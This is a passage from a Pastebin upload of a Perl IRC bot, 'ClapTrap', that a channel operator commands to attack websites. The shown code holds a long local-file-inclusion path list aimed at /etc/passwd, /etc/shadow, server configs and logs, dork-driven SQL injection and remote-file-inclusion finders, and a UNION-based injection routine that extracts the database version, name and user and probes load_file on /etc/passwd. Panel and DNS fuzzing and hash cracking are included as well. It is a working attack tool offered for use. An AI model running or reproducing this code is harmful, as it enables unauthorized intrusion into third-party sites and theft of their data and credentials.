API tools faq
paste
Guest User

Untitled

a guest
Mar 31st, 2015
227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.27 KB | None | 0 0
raw download clone embed print report
  1. );
  2.  
  3. my @buscar3 = (
  4. '../../../boot.ini',
  5. '../../../../boot.ini',
  6. '../../../../../boot.ini',
  7. '../../../../../../boot.ini',
  8. '/etc/passwd',
  9. '/etc/shadow',
  10. '/etc/shadow~',
  11. '/etc/hosts',
  12. '/etc/motd',
  13. '/etc/apache/apache.conf',
  14. '/etc/fstab',
  15. '/etc/apache2/apache2.conf',
  16. '/etc/apache/httpd.conf',
  17. '/etc/httpd/conf/httpd.conf',
  18. '/etc/apache2/httpd.conf',
  19. '/etc/apache2/sites-available/default',
  20. '/etc/mysql/my.cnf',
  21. '/etc/my.cnf',
  22. '/etc/sysconfig/network-scripts/ifcfg-eth0',
  23. '/etc/redhat-release',
  24. '/etc/httpd/conf.d/php.conf',
  25. '/etc/pam.d/proftpd',
  26. '/etc/phpmyadmin/config.inc.php',
  27. '/var/www/config.php',
  28. '/etc/httpd/logs/error_log',
  29. '/etc/httpd/logs/error.log',
  30. '/etc/httpd/logs/access_log',
  31. '/etc/httpd/logs/access.log',
  32. '/var/log/apache/error_log',
  33. '/var/log/apache/error.log',
  34. '/var/log/apache/access_log',
  35. '/var/log/apache/access.log',
  36. '/var/log/apache2/error_log',
  37. '/var/log/apache2/error.log',
  38. '/var/log/apache2/access_log',
  39. '/var/log/apache2/access.log',
  40. '/var/www/logs/error_log',
  41. '/var/www/logs/error.log',
  42. '/var/www/logs/access_log',
  43. '/var/www/logs/access.log',
  44. '/usr/local/apache/logs/error_log',
  45. '/usr/local/apache/logs/error.log',
  46. '/usr/local/apache/logs/access_log',
  47. '/usr/local/apache/logs/access.log',
  48. '/var/log/error_log',
  49. '/var/log/error.log',
  50. '/var/log/access_log',
  51. '/var/log/access.log',
  52. '/etc/group',
  53. '/etc/security/group',
  54. '/etc/security/passwd',
  55. '/etc/security/user',
  56. '/etc/security/environ',
  57. '/etc/security/limits',
  58. '/usr/lib/security/mkuser.default',
  59. '/apache/logs/access.log',
  60. '/apache/logs/error.log',
  61. '/etc/httpd/logs/acces_log',
  62. '/etc/httpd/logs/acces.log',
  63. '/var/log/httpd/access_log',
  64. '/var/log/httpd/error_log',
  65. '/apache2/logs/error.log',
  66. '/apache2/logs/access.log',
  67. '/logs/error.log',
  68. '/logs/access.log',
  69. '/usr/local/apache2/logs/access_log',
  70. '/usr/local/apache2/logs/access.log',
  71. '/usr/local/apache2/logs/error_log',
  72. '/usr/local/apache2/logs/error.log',
  73. '/var/log/httpd/access.log',
  74. '/var/log/httpd/error.log',
  75. '/opt/lampp/logs/access_log',
  76. '/opt/lampp/logs/error_log',
  77. '/opt/xampp/logs/access_log',
  78. '/opt/xampp/logs/error_log',
  79. '/opt/lampp/logs/access.log',
  80. '/opt/lampp/logs/error.log',
  81. '/opt/xampp/logs/access.log',
  82. '/opt/xampp/logs/error.log',
  83. 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  84. 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  85. '/usr/local/apache/conf/httpd.conf',
  86. '/usr/local/apache2/conf/httpd.conf',
  87. '/etc/apache/conf/httpd.conf',
  88. '/usr/local/etc/apache/conf/httpd.conf',
  89. '/usr/local/apache/httpd.conf',
  90. '/usr/local/apache2/httpd.conf',
  91. '/usr/local/httpd/conf/httpd.conf',
  92. '/usr/local/etc/apache2/conf/httpd.conf',
  93. '/usr/local/etc/httpd/conf/httpd.conf',
  94. '/usr/apache2/conf/httpd.conf',
  95. '/usr/apache/conf/httpd.conf',
  96. '/usr/local/apps/apache2/conf/httpd.conf',
  97. '/usr/local/apps/apache/conf/httpd.conf',
  98. '/etc/apache2/conf/httpd.conf',
  99. '/etc/http/conf/httpd.conf',
  100. '/etc/httpd/httpd.conf',
  101. '/etc/http/httpd.conf',
  102. '/etc/httpd.conf',
  103. '/opt/apache/conf/httpd.conf',
  104. '/opt/apache2/conf/httpd.conf',
  105. '/var/www/conf/httpd.conf',
  106. '/private/etc/httpd/httpd.conf',
  107. '/private/etc/httpd/httpd.conf.default',
  108. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  109. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  110. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  111. 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  112. 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  113. 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  114. '/usr/local/php/httpd.conf.php',
  115. '/usr/local/php4/httpd.conf.php',
  116. '/usr/local/php5/httpd.conf.php',
  117. '/usr/local/php/httpd.conf',
  118. '/usr/local/php4/httpd.conf',
  119. '/usr/local/php5/httpd.conf',
  120. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  121. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  122. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  123. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  124. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  125. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  126. '/usr/local/etc/apache/vhosts.conf',
  127. '/etc/php.ini',
  128. '/bin/php.ini',
  129. '/etc/httpd/php.ini',
  130. '/usr/lib/php.ini',
  131. '/usr/lib/php/php.ini',
  132. '/usr/local/etc/php.ini',
  133. '/usr/local/lib/php.ini',
  134. '/usr/local/php/lib/php.ini',
  135. '/usr/local/php4/lib/php.ini',
  136. '/usr/local/php5/lib/php.ini',
  137. '/usr/local/apache/conf/php.ini',
  138. '/etc/php4.4/fcgi/php.ini',
  139. '/etc/php4/apache/php.ini',
  140. '/etc/php4/apache2/php.ini',
  141. '/etc/php5/apache/php.ini',
  142. '/etc/php5/apache2/php.ini',
  143. '/etc/php/php.ini',
  144. '/etc/php/php4/php.ini',
  145. '/etc/php/apache/php.ini',
  146. '/etc/php/apache2/php.ini',
  147. '/web/conf/php.ini',
  148. '/usr/local/Zend/etc/php.ini',
  149. '/opt/xampp/etc/php.ini',
  150. '/var/local/www/conf/php.ini',
  151. '/etc/php/cgi/php.ini',
  152. '/etc/php4/cgi/php.ini',
  153. '/etc/php5/cgi/php.ini',
  154. 'c:\php5\php.ini',
  155. 'c:\php4\php.ini',
  156. 'c:\php\php.ini',
  157. 'c:\PHP\php.ini',
  158. 'c:\WINDOWS\php.ini',
  159. 'c:\WINNT\php.ini',
  160. 'c:\apache\php\php.ini',
  161. 'c:\xampp\apache\bin\php.ini',
  162. 'c:\NetServer\bin\stable\apache\php.ini',
  163. 'c:\home2\bin\stable\apache\php.ini',
  164. 'c:\home\bin\stable\apache\php.ini',
  165. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  166. '/usr/local/cpanel/logs',
  167. '/usr/local/cpanel/logs/stats_log',
  168. '/usr/local/cpanel/logs/access_log',
  169. '/usr/local/cpanel/logs/error_log',
  170. '/usr/local/cpanel/logs/license_log',
  171. '/usr/local/cpanel/logs/login_log',
  172. '/var/cpanel/cpanel.config',
  173. '/var/log/mysql/mysql-bin.log',
  174. '/var/log/mysql.log',
  175. '/var/log/mysqlderror.log',
  176. '/var/log/mysql/mysql.log',
  177. '/var/log/mysql/mysql-slow.log',
  178. '/var/mysql.log',
  179. '/var/lib/mysql/my.cnf',
  180. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  181. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  182. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  183. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  184. 'C:\ProgramFiles\MySQL\data\hostname.err',
  185. 'C:\ProgramFiles\MySQL\data\mysql.log',
  186. 'C:\ProgramFiles\MySQL\data\mysql.err',
  187. 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  188. 'C:\MySQL\data\hostname.err',
  189. 'C:\MySQL\data\mysql.log',
  190. 'C:\MySQL\data\mysql.err',
  191. 'C:\MySQL\data\mysql-bin.log',
  192. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  193. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  194. 'C:\ProgramFiles\MySQL\my.ini',
  195. 'C:\ProgramFiles\MySQL\my.cnf',
  196. 'C:\MySQL\my.ini',
  197. 'C:\MySQL\my.cnf',
  198. '/etc/logrotate.d/proftpd',
  199. '/www/logs/proftpd.system.log',
  200. '/var/log/proftpd',
  201. '/etc/proftp.conf',
  202. '/etc/protpd/proftpd.conf',
  203. '/etc/vhcs2/proftpd/proftpd.conf',
  204. '/etc/proftpd/modules.conf',
  205. '/var/log/vsftpd.log',
  206. '/etc/vsftpd.chroot_list',
  207. '/etc/logrotate.d/vsftpd.log',
  208. '/etc/vsftpd/vsftpd.conf',
  209. '/etc/vsftpd.conf',
  210. '/etc/chrootUsers',
  211. '/var/log/xferlog',
  212. '/var/adm/log/xferlog',
  213. '/etc/wu-ftpd/ftpaccess',
  214. '/etc/wu-ftpd/ftphosts',
  215. '/etc/wu-ftpd/ftpusers',
  216. '/usr/sbin/pure-config.pl',
  217. '/usr/etc/pure-ftpd.conf',
  218. '/etc/pure-ftpd/pure-ftpd.conf',
  219. '/usr/local/etc/pure-ftpd.conf',
  220. '/usr/local/etc/pureftpd.pdb',
  221. '/usr/local/pureftpd/etc/pureftpd.pdb',
  222. '/usr/local/pureftpd/sbin/pure-config.pl',
  223. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  224. '/etc/pure-ftpd/pure-ftpd.pdb',
  225. '/etc/pureftpd.pdb',
  226. '/etc/pureftpd.passwd',
  227. '/etc/pure-ftpd/pureftpd.pdb',
  228. '/var/log/pure-ftpd/pure-ftpd.log',
  229. '/logs/pure-ftpd.log',
  230. '/var/log/pureftpd.log',
  231. '/var/log/ftp-proxy/ftp-proxy.log',
  232. '/var/log/ftp-proxy',
  233. '/var/log/ftplog',
  234. '/etc/logrotate.d/ftp',
  235. '/etc/ftpchroot',
  236. '/etc/ftphosts',
  237. '/var/log/exim_mainlog',
  238. '/var/log/exim/mainlog',
  239. '/var/log/maillog',
  240. '/var/log/exim_paniclog',
  241. '/var/log/exim/paniclog',
  242. '/var/log/exim/rejectlog',
  243. '/var/log/exim_rejectlog'
  244. );
  245.  
  246. my $nave = LWP::UserAgent->new();
  247. $nave->timeout(5);
  248. $nave->agent(
  249. "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
  250. );
  251.  
  252. my $servidor;
  253. my $canal;
  254. my $nick;
  255. my $port;
  256. my $lider;
  257. my $soquete;
  258.  
  259. head();
  260.  
  261. unless ( -f "config.txt" ) {
  262.  
  263. print "\n[+] Server : ";
  264. chomp( my $server = <stdin> );
  265. print "\n[+] Port : ";
  266. chomp( my $port = <stdin> );
  267. print "\n[+] Channel : ";
  268. chomp( my $canal = <stdin> );
  269. print "\n[+] Your Nick : ";
  270. chomp( my $nickz = <stdin> );
  271.  
  272. savefile( "config.txt", "server=" . $server );
  273. savefile( "config.txt", "canal=" . $canal );
  274. savefile( "config.txt", "puerto=" . $port );
  275. savefile( "config.txt", "nick=" . $nickz );
  276.  
  277. print "\n[+] Installed ...\n\n";
  278.  
  279. }
  280.  
  281. my $codez = abrir();
  282. my $tengo_server;
  283. my $tengo_canal;
  284. my $tengo_puerto;
  285. my $tengo_nick;
  286.  
  287. my $control;
  288.  
  289. if ( $codez =~ /server=(.*)/ ) {
  290. $tengo_server = $1;
  291. }
  292.  
  293. if ( $codez =~ /canal=(.*)/ ) {
  294. $tengo_canal = $1;
  295. }
  296.  
  297. if ( $codez =~ /puerto=(.*)/ ) {
  298. $tengo_puerto = $1;
  299. }
  300.  
  301. if ( $codez =~ /nick=(.*)/ ) {
  302. $tengo_nick = $1;
  303. }
  304.  
  305. $servidor = $tengo_server;
  306. $canal = $tengo_canal;
  307. $nick = "ClapTrap";
  308. $port = $tengo_puerto;
  309. $lider = $tengo_nick;
  310.  
  311. party();
  312.  
  313. sub party {
  314.  
  315. print "[+] Starting the bot\n";
  316.  
  317. $soquete = new IO::Socket::INET(
  318. PeerAddr => $servidor,
  319. PeerPort => $port,
  320. Proto => 'tcp'
  321. );
  322.  
  323. if ( !$soquete ) {
  324. print "\n[-] Error\n";
  325. exit 1;
  326. }
  327.  
  328. print $soquete "NICK $nick\r\n";
  329. print $soquete "USER $nick 1 1 1 1\r\n";
  330. print $soquete "JOIN $canal\r\n";
  331.  
  332. print "[+] Online\n\n";
  333.  
  334. while ( my $log = <$soquete> ) {
  335. chomp($log);
  336.  
  337. if ( $log =~ /^PING(.*)$/i ) {
  338. print $soquete "PONG $1\r\n";
  339. }
  340.  
  341. if ( $log =~ /:(.*)!(.*) PRIVMSG (.*) :(.*)/ ) {
  342. if ( $1 eq $lider ) {
  343. $control = 1;
  344. }
  345. else {
  346. $control = "Fuck You";
  347. }
  348. }
  349.  
  350. if ( $control eq 1 ) {
  351.  
  352. if ( $log =~ m/:!help/g ) {
  353. print $soquete
  354. "PRIVMSG $canal : Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014\r\n";
  355. print $soquete "PRIVMSG $canal : [++] Commands\r\n";
  356. print $soquete "PRIVMSG $canal : [+] !help\r\n";
  357. print $soquete "PRIVMSG $canal : [+] !locateip <web>\r\n";
  358. print $soquete "PRIVMSG $canal : [+] !sqlifinder <dork>\r\n";
  359. print $soquete "PRIVMSG $canal : [+] !rfifinder <dork>\r\n";
  360. print $soquete "PRIVMSG $canal : [+] !panel <page>\r\n";
  361. print $soquete "PRIVMSG $canal : [+] !sqli <page>\r\n";
  362. print $soquete "PRIVMSG $canal : [+] !fuzzdns <page>\r\n";
  363. print $soquete "PRIVMSG $canal : [+] !lfi <page>\r\n";
  364. print $soquete "PRIVMSG $canal : [+] !crackit <hash>\r\n";
  365. print $soquete "PRIVMSG $canal : [+] !tinyurl <page>\r\n";
  366. print $soquete "PRIVMSG $canal : [+] !httpfinger <page>\r\n";
  367. print $soquete "PRIVMSG $canal : [+] !md5 <text>\r\n";
  368. print $soquete
  369. "PRIVMSG $canal : [+] !base64 <encode/decode> <text>\r\n";
  370. print $soquete
  371. "PRIVMSG $canal : [+] !ascii <encode/decode> <text>\r\n";
  372. print $soquete
  373. "PRIVMSG $canal : [+] !hex <encode/decode> <text> \r\n";
  374. print $soquete "PRIVMSG $canal : [++] Enjoy this IRC Bot\r\n";
  375. }
  376.  
  377. #print $log."\n";
  378.  
  379. if ( $log =~ m/:!crackit/ ) {
  380.  
  381. $log =~ /:(.*)!(.*)\sPRIVMSG\s(.*)\s:(.*)\s(.*)\s(.*)/;
  382.  
  383. if ( $4 == "!crackit" ) {
  384.  
  385. my $hash = $5;
  386.  
  387. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  388.  
  389. my $re = crackit($hash);
  390. unless ( $re =~ /false01/ ) {
  391. print $soquete "PRIVMSG $canal : [+] MD5 : $re\r\n";
  392. }
  393. else {
  394. print $soquete
  395. "PRIVMSG $canal : [-] Hash not Found\r\n";
  396. }
  397.  
  398. print $soquete "PRIVMSG $canal : [+] Finished\r\n";
  399.  
  400. }
  401.  
  402. }
  403.  
  404. if ( $log =~ m/:!panel (.*)\// ) {
  405.  
  406. my $page = $1;
  407. chomp $page;
  408. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  409. scan($page);
  410. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  411.  
  412. }
  413.  
  414. if ( $log =~ m/:!md5 (.*)$/ ) {
  415.  
  416. my $text = $1;
  417. chomp $text;
  418.  
  419. print $soquete "PRIVMSG $canal : [+] MD5 : "
  420. . md5_hex($text) . "\r\n";
  421.  
  422. }
  423.  
  424. if ( $log =~ m/:!httpfinger (.*)$/g ) {
  425.  
  426. my $page = $1;
  427.  
  428. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  429.  
  430. my $coded = $nave->get($page);
  431.  
  432. print $soquete "PRIVMSG $canal : [+] Date : "
  433. . $coded->header('date') . "\r\n";
  434. print $soquete "PRIVMSG $canal : [+] Server : "
  435. . $coded->header('server') . "\r\n";
  436. print $soquete "PRIVMSG $canal : [+] Connection : "
  437. . $coded->header('connection') . "\r\n";
  438. print $soquete "PRIVMSG $canal : [+] Content-Type : "
  439. . $coded->header('content-type') . "\r\n";
  440.  
  441. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  442. }
  443.  
  444. if ( $log =~ m/:!tinyurl (.*)$/g ) {
  445. my $page = $1;
  446.  
  447. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  448.  
  449. my $code =
  450. toma( "http://tinyurl.com/api-create.php?url=" . $page );
  451.  
  452. unless ( $code =~ /Error/ig ) {
  453. print $soquete "PRIVMSG $canal : [+] Link : $code\r\n";
  454. }
  455. else {
  456. print $soquete "PRIVMSG $canal : [-] Error\r\n";
  457. }
  458.  
  459. }
  460.  
  461. if ( $log =~ m/:!locateip (.*)\//g ) {
  462.  
  463. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  464. infocon($1);
  465. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  466.  
  467. }
  468.  
  469. if ( $log =~ m/:!sqlifinder (.*)$/g ) {
  470.  
  471. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  472. my $dork = $1;
  473. my @paginas = &google( $dork, "30" ); # 30 EDIT
  474. print $soquete "PRIVMSG $canal : [+] SQL Scan Started\r\n";
  475. print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
  476. print $soquete "PRIVMSG $canal : [Webs Count] : "
  477. . int(@paginas) . "\r\n";
  478. print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";
  479.  
  480. for my $page (@paginas) {
  481. my ( $pass1, $pass2 ) = ( "+", "--" );
  482. $code1 =
  483. toma( $page . "-1"
  484. . $pass1 . "union"
  485. . $pass1
  486. . "select"
  487. . $pass1 . "666"
  488. . $pass2 );
  489. if ( $code1 =~
  490. /The used SELECT statements have a different number of columns/ig
  491. )
  492. {
  493. print $soquete "PRIVMSG $canal : [+] SQLI : $page\r\n";
  494. }
  495. }
  496. print $soquete "PRIVMSG $canal : [+] Finished\r\n";
  497. }
  498.  
  499. if ( $log =~ m/:!rfifinder (.*)$/g ) {
  500.  
  501. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  502. my $dork = $1;
  503. my @paginas = &google( $dork, "30" ); # 30 EDIT
  504. print $soquete "PRIVMSG $canal : [+] RFI Scan Started\r\n";
  505. print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
  506. print $soquete "PRIVMSG $canal : [Webs Count] : "
  507. . int(@paginas) . "\r\n";
  508. print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";
  509.  
  510. for my $page (@paginas) {
  511. $code1 = toma( $page . "http:/www.supertangas.com/" );
  512. if ( $code1 =~ /Los mejores TANGAS de la red/ig )
  513. { #Esto es conocimiento de verdad xDDD
  514. print $soquete "PRIVMSG $canal : [+] RFI : $page\r\n";
  515. }
  516. }
  517. print $soquete "PRIVMSG $canal : [+] Finished\r\n";
  518. }
  519.  
  520. if ( $log =~ m/:!sqli (.*)$/g ) {
  521. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  522. print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
  523. scan2($1);
  524. }
  525.  
  526. if ( $log =~ m/:!fuzzdns (.*)$/g ) {
  527. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  528. scan1($1);
  529. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  530. }
  531.  
  532. if ( $log =~ m/:!lfi/ ) {
  533.  
  534. $log =~ /:(.*)!(.*)\sPRIVMSG\s(.*)\s:(.*)\s(.*)\s(.*)/;
  535.  
  536. if ( $4 eq "!lfi" ) {
  537.  
  538. my $page = $5;
  539.  
  540. print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
  541. lfi($page);
  542. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  543. }
  544. }
  545.  
  546. if ( $log =~ m/:!base64 (.*) (.*)$/g ) {
  547. use MIME::Base64;
  548. my ( $opcion, $aa ) = ( $1, $2 );
  549. chop $aa;
  550. if ( $opcion eq "encode" ) {
  551. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  552. print $soquete "PRIVMSG $canal : [+] Encode : "
  553. . encode_base64($aa) . "\r\n";
  554. }
  555. elsif ( $opcion eq "decode" ) {
  556. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  557. print $soquete "PRIVMSG $canal : [+] Text : "
  558. . decode_base64($aa) . "\r\n";
  559. }
  560. else {
  561. print $soquete "PRIVMSG $canal : ??\r\n";
  562. }
  563. }
  564.  
  565. if ( $log =~ m/:!ascii (.*) (.*)$/ ) {
  566. my ( $opcion, $aa ) = ( $1, $2 );
  567. chop $aa;
  568. if ( $opcion eq "encode" ) {
  569. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  570. print $soquete "PRIVMSG $canal : [+] Encode : "
  571. . ascii($aa) . "\r\n";
  572. }
  573. elsif ( $opcion eq "decode" ) {
  574. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  575. print $soquete "PRIVMSG $canal : [+] Text : "
  576. . ascii_de($aa) . "\r\n";
  577. }
  578. else {
  579. print $soquete "PRIVMSG $canal : ???\r\n";
  580. }
  581. }
  582.  
  583. if ( $log =~ m/:!hex (.*) (.*)$/ ) {
  584. my ( $opcion, $aa ) = ( $1, $2 );
  585. chop $aa;
  586. if ( $opcion eq "encode" ) {
  587. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  588. print $soquete "PRIVMSG $canal : [+] Encode : "
  589. . encode($aa) . "\r\n";
  590. }
  591. elsif ( $opcion eq "decode" ) {
  592. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  593. print $soquete "PRIVMSG $canal : [+] Text : "
  594. . decode($aa) . "\r\n";
  595. }
  596. else {
  597. print $soquete "PRIVMSG $canal : ????\r\n";
  598. }
  599. }
  600. }
  601.  
  602. sub lfi {
  603.  
  604. print $soquete "PRIVMSG $canal : [+] Status : [scanning]" . "\r\n";
  605.  
  606. $code = toma( $_[0] . "'" );
  607. if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig
  608. or $code =~
  609. /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
  610. )
  611. {
  612. print $soquete "PRIVMSG $canal : [+] Vulnerable !" . "\r\n";
  613. print $soquete
  614. "PRIVMSG $canal : [*] Full path discloure detected : $1"
  615. . "\r\n";
  616. print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"
  617. . "\r\n";
  618. for my $file (@buscar3) {
  619. $code1 = toma( $_[0] . $file );
  620. unless ( $code1 =~
  621. /No such file or directory in <b>(.*)<\/b> on line/ig
  622. or $code =~
  623. /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
  624. )
  625. {
  626. $ok = 1;
  627. print $soquete "PRIVMSG $canal : [File Found] : "
  628. . $_[0]
  629. . $file . "\r\n";
  630. }
  631. }
  632. unless ( $ok == 1 ) {
  633. print $soquete "PRIVMSG $canal : [-] Dont found any file"
  634. . "\r\n";
  635. }
  636. }
  637. else {
  638. print $soquete
  639. "PRIVMSG $canal : [-] Page not vulnerable to LFI" . "\r\n";
  640. }
  641. }
  642.  
  643. sub scan1 {
  644. print $soquete "PRIVMSG $canal : [*] Searching DNS to "
  645. . $_[0] . "\r\n";
  646. for my $path (@dns) {
  647. $code = tomax( "http://" . $path . "." . $_[0] );
  648. if ( $code->is_success ) {
  649. print $soquete "PRIVMSG $canal : http://"
  650. . $path . "."
  651. . $_[0] . "\r\n";
  652. }
  653. }
  654. }
  655.  
  656. sub scan {
  657. my $page = shift;
  658. chomp $page;
  659. print $soquete "PRIVMSG $canal [*] Searching panels to "
  660. . $page . "\r\n";
  661.  
  662. for my $path (@panels) {
  663. $code = tomados( $page . "/" . $path );
  664. if ( $code->is_success ) {
  665. print "\a";
  666. $ct = 1;
  667. print $soquete "PRIVMSG $canal [Link] : "
  668. . $page . "/"
  669. . $path . "\r\n";
  670. }
  671. }
  672. if ( $ct ne 1 ) {
  673. print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
  674. }
  675. }
  676.  
  677. sub scan2 {
  678.  
  679. my $rows = "0";
  680. my $asc;
  681. my $page = $_[0];
  682.  
  683. ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
  684. $inyection =
  685. $page . "-1"
  686. . $pass1 . "order"
  687. . $pass1 . "by"
  688. . "9999999999"
  689. . $pass2;
  690. $code = toma($inyection);
  691. if ( $code =~
  692. /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
  693. || $code =~ /mysql_free_result/ig
  694. || $code =~ /mysql_fetch_assoc/ig
  695. || $code =~ /mysql_num_rows/ig
  696. || $code =~ /mysql_fetch_array/ig
  697. || $code =~ /mysql_fetch_assoc/ig
  698. || $code =~ /mysql_query/ig
  699. || $code =~ /mysql_free_result/ig
  700. || $code =~ /equivocado en su sintax/ig
  701. || $code =~ /You have an error in your SQL syntax/ig
  702. || $code =~ /Call to undefined function/ig )
  703. {
  704. $code1 =
  705. toma( $page . "-1"
  706. . $pass1 . "union"
  707. . $pass1
  708. . "select"
  709. . $pass1 . "666"
  710. . $pass2 );
  711. if ( $code1 =~
  712. /The used SELECT statements have a different number of columns/ig
  713. )
  714. {
  715. my $path = $1;
  716. chomp $path;
  717. $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  718. $total = "1";
  719. for my $rows ( 2 .. 52 ) {
  720. $asc .= "," . "char("
  721. . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  722. $total .= "," . $rows;
  723. $injection =
  724. $page . "-1"
  725. . $pass1 . "union"
  726. . $pass1
  727. . "select"
  728. . $pass1
  729. . $alert
  730. . $asc;
  731. $test = toma($injection);
  732. if ( $test =~ /RATSXPDOWN/ ) {
  733. @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  734. print $soquete
  735. "PRIVMSG $canal : [Page] : $page\r\n";
  736. print $soquete
  737. "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
  738. print $soquete
  739. "PRIVMSG $canal : [Data] : The number @number print data\r\n";
  740. if ( $test =~ /RATSXPDOWN(\d+)/ ) {
  741. if ($path) {
  742. print $soquete
  743. "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
  744. }
  745. $total =~ s/@number[0]/hackman/;
  746. print $soquete
  747. "PRIVMSG $canal : [+] Injection SQL : "
  748. . $page . "-1"
  749. . $pass1 . "union"
  750. . $pass1
  751. . "select"
  752. . $pass1
  753. . $total . "\r\n";
  754. &details(
  755. $page . "-1"
  756. . $pass1 . "union"
  757. . $pass1
  758. . "select"
  759. . $pass1
  760. . $total,
  761. $_[1]
  762. );
  763. last;
  764. }
  765. }
  766. }
  767. }
  768. }
  769.  
  770. sub details {
  771. my $page = $_[0];
  772. ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
  773. if ( $page =~ /(.*)hackman(.*)/ig ) {
  774. my $start = $1;
  775. my $end = $2;
  776. $test1 =
  777. toma( $start
  778. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  779. . $end
  780. . $pass1 . "from"
  781. . $pass1
  782. . "information_schema.tables"
  783. . $pass2 );
  784. $test2 =
  785. toma( $start
  786. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  787. . $end
  788. . $pass1 . "from"
  789. . $pass1
  790. . "mysql.user"
  791. . $pass2 );
  792. $test3 =
  793. toma( $start
  794. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  795. . $end
  796. . $pass2 );
  797. if ( $test2 =~ /ERTOR854/ig ) {
  798. print $soquete
  799. "PRIVMSG $canal : [+] MYSQL User : ON\r\n";
  800. }
  801. if ( $test1 =~ /ERTOR854/ig ) {
  802. print $soquete
  803. "PRIVMSG $canal : [+] information_schema : ON\r\n";
  804. }
  805. if ( $test3 =~ /ERTOR854/ig ) {
  806. print $soquete
  807. "PRIVMSG $canal : [+] load_file : ON\r\n";
  808. }
  809. $code =
  810. toma( $start
  811. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"
  812. . $end
  813. . $pass2 );
  814. if ( $code =~
  815. /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g )
  816. {
  817. print $soquete
  818. "PRIVMSG $canal : [!] DB Version : $1\r\n";
  819. print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
  820. print $soquete
  821. "PRIVMSG $canal : [!] user_name : $3\r\n";
  822. }
  823. else {
  824. print $soquete
  825. "PRIVMSG $canal : [-] Not found any data\r\n";
  826. }
  827. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  828. }
  829. }
  830. }
  831.  
  832. }
  833.  
  834. sub infocon {
  835. my $target = shift;
  836.  
  837. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($target);
  838.  
  839. if ( $auth ne "" ) {
  840.  
  841. my $get = gethostbyname($auth);
  842. my $target = inet_ntoa($get);
  843.  
